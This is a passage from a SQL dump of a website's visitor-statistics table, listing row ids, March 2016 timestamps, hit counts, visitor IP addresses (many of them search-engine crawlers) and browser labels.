,0,'217.69.133.219','other'),(23924,1458503992,1,1,0,0,'217.69.133.85','other'),(23925,1458504764,2,2,0,0,'82.193.127.15','other'),(23926,1458504795,1,1,0,0,'51.255.65.39','other'),(23927,1458505111,1,1,0,0,'46.219.247.137','chrome'),(23928,1458505663,1,1,0,0,'82.145.218.70','other'),(23929,1458505743,1,1,0,0,'207.46.13.114','other'),(23930,1458506183,1,1,0,0,'151.80.31.175','other'),(23931,1458506306,2,0,2,0,'66.249.78.158',''),(23932,1458506314,1,1,0,0,'193.201.227.144','chrome'),(23933,1458506334,1,1,0,0,'164.132.161.24','other'),(23934,1458506410,1,1,0,0,'82.145.219.72','other'),(23935,1458506604,1,1,0,0,'82.145.219.72','opera'),(23936,1458506870,1,1,0,0,'51.255.65.95','other'),(23937,1458506924,1,1,0,0,'164.132.161.55','other'),(23938,1458506977,2,2,0,0,'207.46.13.80','other'),(23939,1458507478,1,1,0,0,'213.179.252.77','chrome'),(23940,1458507660,1,1,0,0,'8.29.198.26','other'),(23941,1458507803,1,1,0,0,'51.255.66.112','other'),(23942,1458508030,1,1,0,0,'51.255.66.114','other'),(23943,1458508063,1,0,1,0,'66.249.78.151',''),(23944,1458508102,49,49,0,0,'82.193.127.15','other'),(23945,1458508409,1,1,0,0,'141.8.132.99','other'),(23946,1458508846,1,1,0,0,'94.179.71.105','chrome'),(23947,1458509009,5,5,0,0,'82.193.127.15','other'),(23948,1458509025,1,1,0,0,'217.69.133.84','other'),(23949,1458509089,1,1,0,0,'180.76.15.137','other'),(23950,1458509094,1,0,1,0,'66.249.66.166',''),(23951,1458509939,1,0,1,0,'66.249.78.151',''),(23952,1458510210,1,1,0,0,'85.114.214.155','chrome'),(23953,1458510993,1,1,0,0,'66.249.92.99','other'),(23954,1458511058,1,1,0,0,'177.75.16.71','other'),(23955,1458511107,2,0,2,0,'66.249.78.144',''),(23956,1458511265,1,1,0,0,'217.69.143.69','other'),(23957,1458511538,2,0,2,0,'66.249.78.151',''),(23958,1458512182,1,0,1,0,'68.180.229.235',''),(23959,1458512722,124,124,0,0,'82.193.127.15','other'),(23960,1458512734,2,0,2,0,'66.249.78.158',''),(23961,1458513018,1,1,0,0,'207.46.13.80','other'),(23962,1458513119,1,1,0,0,'195.154.146.225','msie'),(23963,1458513228,1,1,0,0,'5.255.253.110','other'),(23964,1458513232,1,1,0,0,'5.255.253.55','other'),(23965,1458513233,1,1,0,0,'91.124.201.247','chrome'),(23966,1458513346,1,1,0,0,'66.249.78.151','other'),(23967,1458513416,1,1,0,0,'207.46.13.44','other'),(23968,1458513560,1,1,0,0,'207.46.13.114','other'),(23969,1458514160,2,1,1,0,'66.249.78.158',''),(23970,1458514309,1,1,0,0,'180.76.15.154','other'),(23971,1458514331,2,0,2,0,'66.249.78.151',''),(23972,1458514574,1,1,0,0,'217.69.133.220','other'),(23973,1458514728,1,0,1,0,'66.249.78.44',''),(23974,1458514729,1,1,0,0,'217.69.143.49','other'),(23975,1458514879,2,0,2,0,'68.180.229.235',''),(23976,1458514900,1,1,0,0,'66.249.78.158','other'),(23977,1458514911,13,6,7,0,'66.249.78.144',''),(23978,1458514921,1,1,0,0,'66.249.78.151','other'),(23979,1458515404,1,1,0,0,'217.69.133.215','other'),(23980,1458515663,1,1,0,0,'51.255.66.128','other'),(23981,1458516347,1,1,0,0,'180.76.15.13','other'),(23982,1458516920,1,1,0,0,'217.69.143.63','other'),(23983,1458516969,1,1,0,0,'207.46.13.73','other'),(23984,1458517002,3,0,3,0,'68.180.229.235',''),(23985,1458517776,2,1,1,0,'66.249.78.158',''),(23986,1458517781,1,1,0,0,'141.8.132.79','other'),(23987,1458518193,2,1,1,0,'66.249.78.144',''),(23988,1458518456,1,1,0,0,'66.249.78.151','other'),(23989,1458518519,1,1,0,0,'8.29.198.26','other'),(23990,1458518530,1,0,1,0,'66.249.66.129',''),(23991,1458518815,2,0,2,0,'68.180.229.235',''),(23992,1458519007,1,0,1,0,'66.249.78.158',''),(23993,1458519583,1,1,0,0,'66.249.78.44','other'),(23994,1458519683,1,1,0,0,'66.249.78.30','other'),(23995,1458519925,1,0,1,0,'66.249.78.151',''),(23996,1458520174,1,1,0,0,'93.158.152.9','other'),(23997,1458520178,1,1,0,0,'141.8.184.11','other'),(23998,1458520181,1,1,0,0,'141.8.142.10','other'),(23999,1458520185,1,1,0,0,'5.255.253.9','other'),(24000,1458520463,1,1,0,0,'93.158.152.26','other'),(24001,1458520467,1,1,0,0,'5.255.253.30','other'),(24002,1458520471,1,1,0,0,'130.193.37.21','other'),(24003,1458520566,2,2,0,0,'66.249.78.158','other'),(24004,1458520591,1,1,0,0,'66.249.78.44','other'),(24005,1458520777,1,1,0,0,'66.249.78.144','other'),(24006,1458520885,1,1,0,0,'207.46.13.80','other'),(24007,1458520907,1,1,0,0,'66.249.66.158','other'),(24008,1458520930,1,1,0,0,'217.69.133.248','other'),(24009,1458521327,1,1,0,0,'217.69.133.221','other'),(24010,1458521430,1,1,0,0,'66.249.78.151','other'),(24011,1458521452,1,1,0,0,'207.46.13.114','other'),(24012,1458521611,2,2,0,0,'66.249.78.158','other'),(24013,1458521640,1,1,0,0,'51.255.65.48','other'),(24014,1458521672,1,1,0,0,'51.255.65.87','other'),(24015,1458521742,1,1,0,0,'217.69.133.2','other'),(24016,1458521754,1,1,0,0,'217.69.143.63','other'),(24017,1458521924,3,3,0,0,'66.249.78.144','other'),(24018,1458521926,1,1,0,0,'151.80.31.178','other'),(24019,1458522170,1,1,0,0,'151.80.31.175','other'),(24020,1458522188,1,1,0,0,'66.249.92.103','other'),(24021,1458522335,1,1,0,0,'66.249.78.44','other'),(24022,1458522947,1,1,0,0,'5.255.253.89','other'),(24023,1458523451,1,0,1,0,'66.249.78.158',''),(24024,1458523461,12,0,12,0,'66.249.78.144',''),(24025,1458523475,1,0,1,0,'66.249.66.190',''),(24026,1458523509,1,0,1,0,'66.249.66.158',''),(24027,1458523645,1,1,0,0,'51.255.65.89','other'),(24028,1458523798,1,0,1,0,'66.249.78.151',''),(24029,1458523893,1,0,1,0,'68.180.229.235',''),(24030,1458524304,1,1,0,0,'51.255.65.19','other'),(24031,1458524955,2,0,2,0,'66.249.78.144',''),(24032,1458525063,1,1,0,0,'180.76.15.12','other'),(24033,1458525181,1,1,0,0,'51.255.65.14','other'),(24034,1458525205,1,0,1,0,'66.249.78.158',''),(24035,1458525450,1,1,0,0,'51.255.65.24','other'),(24036,1458525764,1,1,0,0,'164.132.161.75','other'),(24037,1458526263,2,0,2,0,'68.180.229.235',''),(24038,1458526422,1,1,0,0,'51.255.65.67','other'),(24039,1458526608,1,1,0,0,'51.255.65.92','other'),(24040,1458526637,1,0,1,0,'66.249.78.158',''),(24041,1458526722,1,0,1,0,'66.249.78.37',''),(24042,1458526801,1,1,0,0,'51.255.65.5','other'),(24043,1458527924,1,1,0,0,'51.255.65.8','other'),(24044,1458527952,1,0,1,0,'66.249.66.129',''),(24045,1458528334,3,0,3,0,'66.249.78.144',''),(24046,1458528345,2,0,2,0,'66.249.78.151',''),(24047,1458528904,1,1,0,0,'207.46.13.73','other'),(24048,1458529026,2,1,1,0,'66.249.78.158',''),(24049,1458529306,1,0,1,0,'68.180.229.235',''),(24050,1458529313,3,0,3,0,'66.249.78.151',''),(24051,1458529341,1,1,0,0,'8.29.198.26','other'),(24052,1458529473,3,0,3,0,'66.249.78.144',''),(24053,1458531143,1,1,0,0,'164.132.161.86','other'),(24054,1458531213,1,1,0,0,'217.69.143.60','other'),(24055,1458531281,1,1,0,0,'217.69.133.216','other'),(24056,1458532286,1,1,0,0,'66.249.78.30','other'),(24057,1458532382,1,1,0,0,'51.255.65.57','other'),(24058,1458532742,1,1,0,0,'66.249.92.99','other'),(24059,1458532755,2,0,2,0,'66.249.78.144',''),(24060,1458532772,1,1,0,0,'62.210.215.100','chrome'),(24061,1458533071,1,1,0,0,'193.201.227.144','chrome'),(24062,1458533623,1,1,0,0,'217.69.133.215','other'),(24063,1458533849,2,2,0,0,'66.249.78.144','other'),(24064,1458534283,1,1,0,0,'217.69.133.14','other'),(24065,1458534399,9,9,0,0,'207.46.13.73','other'),(24066,1458534406,12,12,0,0,'207.46.13.44','other'),(24067,1458534417,11,11,0,0,'207.46.13.114','other'),(24068,1458534484,6,6,0,0,'207.46.13.80','other'),(24069,1458534486,1,1,0,0,'164.132.161.63','other'),(24070,1458535090,1,1,0,0,'164.132.161.43','other'),(24071,1458535124,2,0,2,0,'66.249.78.151',''),(24072,1458535130,1,0,1,0,'68.180.229.235',''),(24073,1458535543,1,1,0,0,'66.249.66.162','other'),(24074,1458535613,4,4,0,0,'82.193.127.15','other'),(24075,1458535841,1,0,1,0,'207.46.13.80',''),(24076,1458536431,1,1,0,0,'66.249.78.144','other'),(24077,1458536752,1,1,0,0,'130.193.51.81','other'),(24078,1458536924,1,1,0,0,'51.255.65.30','other'),(24079,1458537073,1,1,0,0,'217.69.133.225','other'),(24080,1458537076,1,0,1,0,'68.180.229.235',''),(24081,1458537319,1,1,0,0,'66.249.78.44','other'),(24082,1458537887,1,0,1,0,'66.249.66.158',''),(24083,1458538259,1,1,0,0,'217.69.143.59','other'),(24084,1458538284,1,1,0,0,'207.46.13.44','other'),(24085,1458539215,1,0,1,0,'66.249.78.151',''),(24086,1458539317,99,99,0,0,'69.30.198.242','other'),(24087,1458539324,1,1,0,0,'207.46.13.80','other'),(24088,1458539609,1,1,0,0,'217.69.133.14','other'),(24089,1458540177,1,1,0,0,'8.29.198.25','other'),(24090,1458540221,1,1,0,0,'217.69.133.217','other'),(24091,1458540902,1,1,0,0,'91.196.178.71','firefox'),(24092,1458540935,1,1,0,0,'141.8.142.10','other'),(24093,1458541445,1,0,1,0,'68.180.229.235',''),(24094,1458541878,1,0,1,0,'66.249.78.144',''),(24095,1458542048,1,1,0,0,'91.196.178.169','chrome'),(24096,1458542399,1,1,0,0,'217.69.133.18','other'),(24097,1458542588,1,1,0,0,'178.154.189.204','other'),(24098,1458542595,1,1,0,0,'37.9.122.203','other'),(24099,1458542687,1,1,0,0,'91.196.178.71','chrome'),(24100,1458543083,1,1,0,0,'37.9.122.201','other'),(24101,1458543331,1,1,0,0,'51.255.65.59','other'),(24102,1458543464,1,1,0,0,'66.249.92.95','other'),(24103,1458543499,1,1,0,0,'217.69.133.218','other'),(24104,1458543500,1,1,0,0,'217.69.133.67','other'),(24105,1458543569,2,2,0,0,'178.154.189.204','other'),(24106,1458543744,1,1,0,0,'207.46.13.114','other'),(24107,1458543937,1,1,0,0,'217.69.133.68','other'),(24108,1458543946,1,1,0,0,'87.207.112.42','firefox'),(24109,1458544114,1,0,1,0,'66.249.78.151',''),(24110,1458544332,2,0,2,0,'66.249.78.37',''),(24111,1458544568,5,5,0,0,'178.154.189.204','other'),(24112,1458544819,1,1,0,0,'217.69.133.217','other'),(24113,1458544855,1,1,0,0,'207.46.13.73','other'),(24114,1458545301,4,0,4,0,'66.249.78.151',''),(24115,1458545386,3,0,3,0,'68.180.229.235',''),(24116,1458545431,1,1,0,0,'37.54.33.78','chrome'),(24117,1458545526,2,2,0,0,'178.154.189.204','other'),(24118,1458545783,1,1,0,0,'37.53.76.152','firefox'),(24119,1458545844,1,1,0,0,'95.134.3.230','msie'),(24120,1458545930,2,0,2,0,'66.249.78.158',''),(24121,1458545937,1,1,0,0,'217.69.133.193','other'),(24122,1458545944,1,1,0,0,'217.69.133.215','other'),(24123,1458546000,1,1,0,0,'217.69.143.69','other'),(24124,1458546127,1,1,0,0,'157.55.39.224','other'),(24125,1458546214,1,1,0,0,'37.53.173.188','chrome'),(24126,1458546423,1,0,1,0,'66.249.78.151',''),(24127,1458546430,1,0,1,0,'68.180.229.235',''),(24128,1458546855,2,2,0,0,'91.196.178.71','chrome'),(24129,1458547013,1,1,0,0,'46.201.240.112','firefox'),(24130,1458547034,1,1,0,0,'51.255.66.112','other'),(24131,1458547174,1,1,0,0,'51.255.65.15','other'),(24132,1458547225,1,1,0,0,'157.55.39.224','other'),(24133,1458547317,1,1,0,0,'66.249.78.37','other'),(24134,1458547337,5,5,0,0,'66.249.78.144','other'),(24135,1458547364,2,2,0,0,'66.249.78.151','other'),(24136,1458547485,1,1,0,0,'66.249.66.158','other'),(24137,1458547766,1,0,1,0,'66.249.78.158',''),(24138,1458548035,1,1,0,0,'217.69.133.218','other'),(24139,1458548091,1,1,0,0,'66.249.78.158','other'),(24140,1458548532,1,1,0,0,'164.132.161.52','other'),(24141,1458548583,1,1,0,0,'180.76.15.13','other'),(24142,1458548611,1,1,0,0,'157.55.39.224','other'),(24143,1458548825,1,1,0,0,'46.201.135.203','chrome'),(24144,1458548933,1,1,0,0,'94.178.147.24','opera'),(24145,1458549020,1,1,0,0,'51.255.65.8','other'),(24146,1458549190,1,1,0,0,'91.196.178.67','firefox'),(24147,1458549362,1,1,0,0,'94.179.72.160','firefox'),(24148,1458549516,1,1,0,0,'217.69.143.52','other'),(24149,1458549530,1,1,0,0,'151.80.31.105','other'),(24150,1458549631,1,1,0,0,'217.69.133.226','other'),(24151,1458549639,1,1,0,0,'217.69.133.194','other'),(24152,1458550252,1,1,0,0,'82.207.91.234','firefox'),(24153,1458550369,2,0,2,0,'66.249.78.151',''),(24154,1458550408,1,1,0,0,'157.55.39.224','other'),(24155,1458550671,1,0,1,0,'66.249.78.44',''),(24156,1458550752,1,1,0,0,'62.210.215.100','chrome'),(24157,1458550783,1,1,0,0,'93.183.204.29','firefox'),(24158,1458551042,1,1,0,0,'8.29.198.26','other'),(24159,1458551323,1,1,0,0,'82.207.49.106','chrome'),(24160,1458551601,1,1,0,0,'5.175.13.138','msie'),(24161,1458551724,2,0,2,0,'68.180.229.235',''),(24162,1458552098,2,2,0,0,'157.55.39.224','other'),(24163,1458552538,1,1,0,0,'207.46.13.44','other'),(24164,1458552576,1,1,0,0,'66.249.93.86','chrome'),(24165,1458553525,1,1,0,0,'217.69.136.210','other'),(24166,1458553651,2,2,0,0,'157.55.39.224','other'),(24167,1458553731,1,1,0,0,'78.111.185.165','other'),(24168,1458553752,1,1,0,0,'66.249.78.151','other'),(24169,1458553826,1,1,0,0,'117.78.13.18','other'),(24170,1458553841,1,1,0,0,'37.53.90.175','firefox'),(24171,1458553874,1,1,0,0,'91.196.178.69','chrome'),(24172,1458553942,1,1,0,0,'37.52.172.121','chrome'),(24173,1458554028,1,1,0,0,'95.132.7.18','chrome'),(24174,1458554072,1,0,1,0,'66.249.66.133',''),(24175,1458554113,1,0,1,0,'66.249.78.158',''),(24176,1458554582,1,1,0,0,'93.183.204.29','firefox'),(24177,1458554674,1,1,0,0,'178.95.246.216','chrome'),(24178,1458554817,1,1,0,0,'94.178.106.100','chrome'),(24179,1458554880,1,1,0,0,'66.249.92.99','other'),(24180,1458554886,2,1,1,0,'66.249.78.151',''),(24181,1458554908,3,3,0,0,'157.55.39.224','other'),(24182,1458555306,1,1,0,0,'94.179.112.33','other'),(24183,1458555395,1,1,0,0,'193.29.204.8','chrome'),(24184,1458555442,1,1,0,0,'217.69.143.70','other'),(24185,1458555596,1,1,0,0,'194.44.213.142','firefox'),(24186,1458555864,1,1,0,0,'91.196.178.166','firefox'),(24187,1458555921,2,1,1,0,'66.249.78.151',''),(24189,1458555922,1,1,0,0,'46.98.7.126','firefox'),(24190,1458555935,1,1,0,0,'141.8.132.74','other'),(24191,1458556114,1,1,0,0,'151.80.31.108','other'),(24192,1458556302,1,1,0,0,'207.46.13.114','other'),(24193,1458556380,1,1,0,0,'91.196.178.65','firefox'),(24194,1458556383,2,0,2,0,'68.180.229.235',''),(24195,1458556443,1,1,0,0,'157.55.39.224','other'),(24196,1458556598,1,1,0,0,'164.132.161.15','other'),(24197,1458557019,1,1,0,0,'217.69.133.18','other'),(24198,1458557251,2,2,0,0,'207.46.13.118','other'),(24199,1458557541,1,1,0,0,'66.249.78.144','other'),(24200,1458557575,1,1,0,0,'217.69.143.55','other'),(24201,1458557640,1,1,0,0,'185.43.251.187','chrome'),(24202,1458557877,1,1,0,0,'91.196.178.71','firefox'),(24203,1458558046,1,1,0,0,'46.211.154.14','other'),(24204,1458558081,29,29,0,0,'141.8.184.18','other'),(24205,1458558089,23,23,0,0,'93.158.152.9','other'),(24206,1458558282,1,1,0,0,'130.193.37.21','other'),(24207,1458558293,3,3,0,0,'141.8.132.99','other'),(24208,1458558297,26,26,0,0,'141.8.183.14','other'),(24209,1458558315,28,28,0,0,'178.154.149.11','other'),(24210,1458558336,6,6,0,0,'5.255.253.53','other'),(24211,1458558372,2,2,0,0,'207.46.13.118','other'),(24212,1458558559,1,1,0,0,'91.196.178.169','opera'),(24213,1458558925,1,1,0,0,'66.102.9.104','chrome'),(24214,1458559319,1,0,1,0,'66.249.78.144',''),(24215,1458559511,1,0,1,0,'68.180.229.235',''),(24216,1458559557,1,0,1,0,'66.249.78.151',''),(24217,1458559698,2,2,0,0,'66.249.78.144','other'),(24218,1458559771,1,1,0,0,'164.132.161.56','other'),(24219,1458559842,2,2,0,0,'66.249.78.37','other'),(24220,1458559946,1,1,0,0,'217.69.143.45','other'),(24221,1458560020,2,2,0,0,'66.249.78.44','other'),(24222,1458560022,1,1,0,0,'207.46.13.118','other'),(24223,1458560028,1,1,0,0,'141.8.184.18','other'),(24224,1458560312,1,1,0,0,'51.255.65.97','other'),(24225,1458560536,1,1,0,0,'95.132.58.54','opera'),(24226,1458560606,1,1,0,0,'66.249.78.158','other'),(24227,1458560645,1,1,0,0,'66.249.66.166','other'),(24228,1458560656,1,1,0,0,'178.154.149.11','other'),(24229,1458560728,1,1,0,0,'37.53.90.175','firefox'),(24230,1458560784,1,1,0,0,'130.193.37.21','other'),(24232,1458560793,1,1,0,0,'91.196.178.133','chrome'),(24233,1458560839,1,0,1,0,'66.249.78.151',''),(24234,1458560893,1,1,0,0,'66.249.78.151','other'),(24235,1458560976,2,0,2,0,'68.180.229.235',''),(24236,1458561245,2,2,0,0,'207.46.13.118','other'),(24237,1458561508,1,1,0,0,'141.8.184.18','other'),(24238,1458561691,1,1,0,0,'91.196.178.70','msie'),(24239,1458561731,1,1,0,0,'37.54.90.213','chrome'),(24240,1458561833,1,1,0,0,'66.249.66.158','other'),(24241,1458561919,1,1,0,0,'8.29.198.26','other'),(24242,1458561930,1,1,0,0,'91.196.178.33','chrome'),(24243,1458562119,1,1,0,0,'66.249.78.30','other'),(24244,1458562342,2,2,0,0,'66.249.78.37','other'),(24245,1458562359,1,1,0,0,'66.249.78.151','other'),(24246,1458562630,1,0,1,0,'66.249.78.144',''),(24247,1458562778,3,3,0,0,'141.8.132.99','other'),(24248,1458562780,3,3,0,0,'141.8.184.18','other'),(24249,1458562781,2,2,0,0,'130.193.37.21','other'),(24251,1458562794,1,1,0,0,'92.112.19.231','chrome'),(24252,1458562873,1,1,0,0,'93.158.152.9','other'),(24253,1458562877,4,4,0,0,'5.255.253.53','other'),(24254,1458563019,2,2,0,0,'207.46.13.118','other'),(24255,1458563240,1,1,0,0,'217.69.133.67','other'),(24256,1458563272,1,0,1,0,'66.249.78.151',''),(24257,1458563447,1,1,0,0,'66.249.78.30','other'),(24258,1458563457,1,0,1,0,'66.249.78.158',''),(24259,1458563885,13,13,0,0,'141.8.183.14','other'),(24260,1458563887,2,2,0,0,'5.255.253.100','other'),(24261,1458563888,8,8,0,0,'141.8.132.99','other'),(24262,1458563890,6,6,0,0,'5.255.253.53','other'),(24263,1458563891,4,4,0,0,'130.193.37.21','other'),(24264,1458563894,6,6,0,0,'141.8.184.18','other'),(24265,1458563899,3,3,0,0,'178.154.149.11','other'),(24266,1458563908,1,1,0,0,'93.158.152.9','other'),(24267,1458563950,1,1,0,0,'78.111.185.183','chrome'),(24268,1458564142,1,1,0,0,'92.113.16.168','chrome'),(24269,1458564168,1,1,0,0,'82.145.218.141','other'),(24270,1458564651,1,1,0,0,'207.46.13.118','other'),(24271,1458564755,1,0,1,0,'68.180.229.235',''),(24272,1458565010,1,1,0,0,'94.179.61.103','firefox'),(24273,1458565114,1,1,0,0,'66.249.92.95','other'),(24274,1458565149,1,1,0,0,'151.80.31.175','other'),(24275,1458565362,1,1,0,0,'217.69.136.209','other'),(24276,1458565539,1,1,0,0,'95.133.7.189','firefox'),(24277,1458565702,1,1,0,0,'207.46.13.118','other'),(24278,1458565747,2,2,0,0,'91.196.178.69','chrome'),(24279,1458565757,1,0,1,0,'68.180.229.235',''),(24280,1458565781,4,1,3,0,'66.249.78.144',''),(24281,1458565786,1,1,0,0,'217.69.143.51','other'),(24282,1458566260,1,1,0,0,'91.196.178.71','firefox'),(24283,1458566428,1,0,1,0,'66.249.78.151',''),(24284,1458566474,1,0,1,0,'66.249.78.158',''),(24285,1458566662,1,0,1,0,'68.180.229.235',''),(24286,1458566701,2,2,0,0,'194.44.63.27','firefox'),(24287,1458566873,1,1,0,0,'51.255.65.16','other'),(24288,1458566921,1,1,0,0,'141.8.184.18','other'),(24289,1458566922,1,1,0,0,'5.255.253.100','other'),(24290,1458567033,1,0,1,0,'66.249.78.144',''),(24291,1458567057,1,1,0,0,'217.69.143.47','other'),(24292,1458567352,1,0,1,0,'66.249.66.166',''),(24293,1458567369,1,1,0,0,'66.249.78.151','other'),(24294,1458567375,1,1,0,0,'77.47.223.182','chrome'),(24295,1458567766,1,1,0,0,'185.43.251.187','chrome'),(24296,1458567945,1,1,0,0,'207.46.13.73','other'),(24297,1458567983,1,0,1,0,'66.249.78.37',''),(24298,1458568205,1,1,0,0,'91.196.178.69','chrome'),(24299,1458568388,1,1,0,0,'217.69.133.4','other'),(24300,1458568406,1,0,1,0,'68.180.229.235',''),(24301,1458568937,1,1,0,0,'37.53.89.22','chrome'),(24302,1458569094,1,1,0,0,'95.133.7.142','msie'),(24303,1458569146,1,1,0,0,'91.196.178.71','firefox'),(24304,1458569403,1,1,0,0,'37.55.208.154','chrome'),(24305,1458569786,1,0,1,0,'66.249.78.144',''),(24306,1458569827,1,1,0,0,'91.196.178.169','opera'),(24307,1458569922,1,1,0,0,'66.249.78.44','other'),(24308,1458569998,1,1,0,0,'66.249.78.144','other'),(24309,1458570175,1,0,1,0,'68.180.229.235',''),(24310,1458570956,1,1,0,0,'91.196.178.39','chrome'),(24311,1458571183,1,0,1,0,'68.180.229.235',''),(24312,1458571276,2,2,0,0,'37.53.164.156','firefox'),(24313,1458571284,1,0,1,0,'66.249.78.144',''),(24314,1458571314,1,1,0,0,'217.69.133.226','other'),(24315,1458571332,1,1,0,0,'217.69.133.3','other'),(24316,1458571338,1,0,1,0,'66.249.78.151',''),(24317,1458571837,10,10,0,0,'69.58.178.57','firefox'),(24318,1458571934,1,1,0,0,'37.55.208.154','chrome'),(24319,1458572562,1,1,0,0,'66.249.78.37','other'),(24320,1458572589,1,0,1,0,'66.249.78.151',''),(24321,1458573093,1,1,0,0,'8.29.198.25','other'),(24322,1458573429,1,1,0,0,'51.255.66.107','other'),(24323,1458573462,1,1,0,0,'95.111.128.135','chrome'),(24324,1458573626,1,1,0,0,'217.69.143.57','other'),(24325,1458573854,1,1,0,0,'91.196.178.169','opera'),(24326,1458574067,1,0,1,0,'66.249.78.144',''),(24327,1458574200,1,1,0,0,'91.196.178.135','firefox'),(24328,1458574265,1,1,0,0,'66.249.78.158','other'),(24329,1458574284,2,1,1,0,'66.249.78.37',''),(24330,1458574844,2,2,0,0,'66.249.78.44','other'),(24331,1458574950,1,0,1,0,'66.249.78.151',''),(24332,1458575160,1,0,1,0,'68.180.229.235',''),(24333,1458575436,5,3,2,0,'66.249.78.144',''),(24334,1458575593,1,1,0,0,'207.46.13.56','other'),(24335,1458575696,1,1,0,0,'66.249.92.103','other'),(24336,1458575786,2,2,0,0,'66.249.78.158','other'),(24337,1458575987,1,1,0,0,'66.249.78.151','other'),(24338,1458576000,1,1,0,0,'91.229.243.51','firefox'),(24339,1458576043,1,1,0,0,'178.93.149.164','chrome'),(24340,1458576436,1,1,0,0,'185.43.251.187','chrome'),(24341,1458576779,1,1,0,0,'217.69.133.222','other'),(24342,1458576780,1,1,0,0,'217.69.133.224','other'),(24343,1458576894,1,1,0,0,'66.249.78.151','other'),(24344,1458577299,1,1,0,0,'157.55.39.17','other'),(24345,1458577762,1,1,0,0,'66.249.78.144','other'),(24346,1458577808,1,1,0,0,'66.249.66.158','other'),(24347,1458578058,1,1,0,0,'66.249.78.151','other'),(24348,1458578077,1,1,0,0,'144.76.93.46','other'),(24349,1458578148,1,1,0,0,'217.69.133.225','other'),(24350,1458578206,1,1,0,0,'217.69.133.14','other'),(24351,1458578593,1,1,0,0,'66.249.66.166','other'),(24352,1458578768,2,2,0,0,'207.46.13.114','other'),(24353,1458578878,1,0,1,0,'66.249.78.158',''),(24354,1458579484,1,1,0,0,'180.76.15.150','other'),(24355,1458579486,4,0,4,0,'66.249.78.151',''),(24356,1458579521,1,1,0,0,'217.69.143.47','other'),(24357,1458579630,1,1,0,0,'51.255.65.59','other'),(24358,1458579717,2,0,2,0,'66.249.78.44',''),(24359,1458579869,1,1,0,0,'217.69.133.12','other'),(24360,1458579913,1,1,0,0,'217.69.133.215','other'),(24361,1458579932,1,0,1,0,'66.249.66.166',''),(24362,1458579984,1,0,1,0,'66.249.78.144',''),(24363,1458579999,2,0,2,0,'66.249.78.30',''),(24364,1458580004,1,0,1,0,'66.249.66.158',''),(24365,1458580005,5,5,0,0,'62.210.148.247','other'),(24366,1458580038,1,1,0,0,'66.249.78.37','other'),(24367,1458580081,4,1,3,0,'66.249.78.144',''),(24368,1458580181,1,0,1,0,'66.249.66.133',''),(24369,1458580243,2,1,1,0,'66.249.78.151',''),(24370,1458580290,1,1,0,0,'217.69.133.84','other'),(24371,1458580349,4,4,0,0,'83.149.126.98','other'),(24372,1458580408,1,1,0,0,'51.255.65.7','other'),(24373,1458580633,1,1,0,0,'217.69.143.56','other'),(24374,1458580634,1,1,0,0,'217.69.143.58','other'),(24375,1458581459,1,1,0,0,'66.102.9.104','chrome'),(24376,1458581510,1,1,0,0,'217.69.133.222','other'),(24377,1458581995,1,0,1,0,'68.180.229.235',''),(24378,1458582126,1,1,0,0,'93.158.152.9','other'),(24379,1458582130,1,1,0,0,'141.8.184.18','other'),(24380,1458582226,1,0,1,0,'66.249.66.162',''),(24381,1458582385,1,1,0,0,'217.69.136.203','other'),(24382,1458582438,2,0,2,0,'66.249.78.144',''),(24383,1458582651,1,1,0,0,'217.69.133.222','other'),(24384,1458582749,1,1,0,0,'164.132.161.6','other'),(24385,1458582913,1,1,0,0,'5.83.23.12','chrome'),(24386,1458583839,1,1,0,0,'207.46.13.23','other'),(24387,1458584087,1,1,0,0,'40.77.167.42','other'),(24388,1458584633,1,1,0,0,'130.193.51.45','other'),(24389,1458584796,2,0,2,0,'68.180.229.235',''),(24390,1458585150,1,0,1,0,'66.249.78.151',''),(24391,1458585159,2,1,1,0,'66.249.78.30',''),(24392,1458585264,1,1,0,0,'91.196.178.68','firefox'),(24393,1458585404,1,0,1,0,'66.249.78.144',''),(24394,1458585476,1,1,0,0,'40.77.167.42','other'),(24395,1458585642,1,1,0,0,'8.29.198.26','other'),(24396,1458585661,1,1,0,0,'141.0.15.194','other'),(24397,1458585720,1,1,0,0,'180.76.15.150','other'),(24398,1458585753,1,1,0,0,'180.76.15.139','other'),(24399,1458585780,1,0,1,0,'68.180.229.235',''),(24400,1458585857,1,1,0,0,'207.46.13.23','other'),(24401,1458585862,1,1,0,0,'62.210.215.100','chrome'),(24402,1458586113,1,1,0,0,'66.249.92.99','other'),(24403,1458586224,1,1,0,0,'178.95.245.247','firefox'),(24404,1458586309,55,55,0,0,'178.63.1.153','other'),(24405,1458586367,2,2,0,0,'141.8.132.2','other'),(24406,1458586375,1,1,0,0,'141.8.132.99','other'),(24407,1458586435,1,1,0,0,'207.46.13.118','other'),(24408,1458586939,2,0,2,0,'68.180.229.235',''),(24409,1458586954,1,1,0,0,'130.193.51.81','other'),(24410,1458586959,1,1,0,0,'141.8.142.10','other'),(24411,1458586962,2,2,0,0,'93.158.152.26','other'),(24412,1458587046,1,1,0,0,'207.46.13.23','other'),(24413,1458587100,1,0,1,0,'66.249.66.166',''),(24414,1458587215,2,2,0,0,'178.63.1.153','other'),(24415,1458587844,1,1,0,0,'195.58.251.81','chrome'),(24416,1458588054,2,0,2,0,'66.249.78.144',''),(24417,1458588646,1,1,0,0,'164.132.161.56','other'),(24418,1458588863,1,1,0,0,'5.255.253.55','other'),(24419,1458588898,1,0,1,0,'66.249.78.151',''),(24420,1458589008,2,2,0,0,'5.9.11.122','chrome'),(24421,1458589294,1,1,0,0,'141.8.184.11','other'),(24422,1458589297,1,1,0,0,'141.8.142.88','other'),(24423,1458589301,1,1,0,0,'5.255.253.10','other'),(24424,1458589304,1,1,0,0,'141.8.132.44','other'),(24425,1458589308,1,1,0,0,'141.8.132.76','other'),(24426,1458589512,1,1,0,0,'217.69.143.63','other'),(24427,1458589536,1,1,0,0,'40.77.167.42','other'),(24428,1458589982,2,2,0,0,'51.255.65.94','other'),(24429,1458590016,1,0,1,0,'66.249.78.158',''),(24430,1458590144,1,0,1,0,'68.180.229.235',''),(24431,1458590160,1,1,0,0,'217.69.133.220','other'),(24432,1458590189,1,1,0,0,'66.249.78.151','other'),(24433,1458590240,2,2,0,0,'66.249.78.37','other'),(24434,1458590274,1,1,0,0,'66.249.78.144','other'),(24435,1458590353,1,1,0,0,'66.249.78.30','other'),(24436,1458590452,1,1,0,0,'207.46.13.56','other'),(24437,1458590528,1,1,0,0,'164.132.161.95','other'),(24438,1458590876,1,1,0,0,'217.69.143.45','other'),(24439,1458591206,6,6,0,0,'141.8.184.18','other'),(24440,1458591451,1,1,0,0,'217.69.133.11','other'),(24441,1458591453,1,1,0,0,'217.69.133.10','other'),(24442,14585917